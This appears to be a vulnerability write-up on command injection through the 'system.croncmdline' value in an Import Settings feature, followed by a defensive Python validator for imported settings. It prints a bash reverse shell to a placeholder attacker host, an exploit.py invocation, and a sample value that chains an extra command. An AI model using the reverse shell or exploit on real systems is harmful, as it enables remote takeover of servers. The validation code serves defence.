Due to improper data validation in the “Import Settings” feature, an authenticated attacker can send crafted settings with a malicious payload inside the “system.croncmdline” value.
Requirement: PHP code must be executed on attacker machine
foo.txt file. The content of this file is a reverse shell to the attacker machine, for example:
#!/bin/bash
bash -i >& /dev/tcp/{ATTACKER-IP}/{ATTACKER-PORT} 0>&1
exploit.py and required by this exploit
python3 exploit.py -t {VICTIM-WEBSERVER} -u {USERNAME} -p {PASSWORD} -s {ATTACKER-WEBSERVER} -lport {ATTACKER-LISTENING-PORT}
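A server-side check for the missing validation in “Import Settings” described above, as an added example that is not code from the original page or from the affected project. It assumes imported settings arrive as a flat key/value mapping; the function names, the allowlisted interpreter paths and the sample import are hypothetical.

```python
import re
import shlex

# Assumption: imported settings are a flat dict of key -> string value.
# Keys whose values are later executed; the page names only this one.
EXECUTED_KEYS = {"system.croncmdline"}
# Assumption: interpreter paths an administrator would legitimately configure.
ALLOWED_BINARIES = {"/usr/bin/php", "/usr/local/bin/php"}
# Characters that let a value chain, redirect or substitute shell commands.
SHELL_META = re.compile(r"[;&|<>`$(){}\\\n\r!*?~#]")
SAFE_ARG = re.compile(r"^[A-Za-z0-9_./=:-]+$")

def check_cmdline(value):
    """Return None if value is an acceptable command line, else a reason."""
    if SHELL_META.search(value):
        return "shell metacharacter in value"
    try:
        argv = shlex.split(value)
    except ValueError:
        return "unbalanced quoting"
    if not argv:
        return "empty command"
    if argv[0] not in ALLOWED_BINARIES:
        return "binary not on allowlist: " + argv[0]
    for arg in argv[1:]:
        if not SAFE_ARG.match(arg):
            return "unexpected characters in argument"
    return None

def validate_import(settings):
    """Split imported settings into (accepted, rejected) before storing any."""
    accepted, rejected = {}, {}
    for key, value in settings.items():
        reason = check_cmdline(str(value)) if key in EXECUTED_KEYS else None
        if reason is None:
            accepted[key] = value
        else:
            rejected[key] = reason
    return accepted, rejected

# Constructed sample import: one benign key and a chained cron command line.
SAMPLE = {
    "site.title": "Intranet",
    "system.croncmdline": "/usr/bin/php -f cron.php; id",
}
if __name__ == "__main__":
    print(validate_import(SAMPLE))
```

Rejected keys should fail the whole import and be logged with the authenticated user, since a changed cron command line in an import file is itself worth alerting on.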